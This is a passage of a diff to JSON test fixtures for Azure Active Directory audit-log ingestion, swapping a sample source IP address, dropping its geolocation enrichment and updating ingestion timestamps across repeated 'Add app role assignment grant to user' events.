"continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -20013,7 +18267,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -20145,7 +18399,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -20157,12 +18411,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036592300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-7
64e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\
"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125396900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"a
ctorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to 
user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -20188,25 +18442,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -20220,7 +18456,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -20352,7 +18588,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -20364,12 +18600,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036596200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-7
64e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\
"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125401700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"a
ctorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to 
user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -20395,25 +18631,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -20427,7 +18645,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -20559,7 +18777,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -20571,12 +18789,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036600100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b66